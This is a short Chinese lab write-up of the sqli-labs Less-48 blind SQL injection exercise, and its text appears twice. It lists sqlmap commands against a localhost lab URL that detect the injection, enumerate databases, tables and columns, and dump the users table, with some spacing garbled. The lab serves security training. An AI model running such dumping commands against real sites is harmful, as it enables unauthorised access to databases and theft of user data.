SQLI-LAPS 实验记录Less-48这一关是盲注页面上没有任何反馈信息所以我们采用sqlmap工具来帮助进行自动化注入。首先我们在命令行中输入sqlmap命令sqlmap-u http://localhost/sqli-labs/Less-48/?sort1 --batch结果如图所示有两种注入方式可选布尔盲注和时间盲注接下来我们继续采用sqlmap自动化注入。sqlmap-u http://localhost/sqli-labs/Less-48/?sort1 --batch --dbs结果如图所示页面返回数据库的名称注入有效。之后我们可以继续使用sqlmap注入的方式对表名、列名等内容进行注入。爆出表名sqlmap-u http://localhost/sqli-labs/Less-48/?sort1 --batch -D security --tables爆出列名sqlmap-u http://localhost/sqli-labs/Less-48/?sort1 --batch -D security -T users --columns爆出内容sqlmap-u http://localhost/sqli-labs/Less-48/?sort1 --batch -D security -T users --dump
sqli-labs-Less-48
SQLI-LAPS 实验记录Less-48这一关是盲注页面上没有任何反馈信息所以我们采用sqlmap工具来帮助进行自动化注入。首先我们在命令行中输入sqlmap命令sqlmap-u http://localhost/sqli-labs/Less-48/?sort1 --batch结果如图所示有两种注入方式可选布尔盲注和时间盲注接下来我们继续采用sqlmap自动化注入。sqlmap-u http://localhost/sqli-labs/Less-48/?sort1 --batch --dbs结果如图所示页面返回数据库的名称注入有效。之后我们可以继续使用sqlmap注入的方式对表名、列名等内容进行注入。爆出表名sqlmap-u http://localhost/sqli-labs/Less-48/?sort1 --batch -D security --tables爆出列名sqlmap-u http://localhost/sqli-labs/Less-48/?sort1 --batch -D security -T users --columns爆出内容sqlmap-u http://localhost/sqli-labs/Less-48/?sort1 --batch -D security -T users --dump
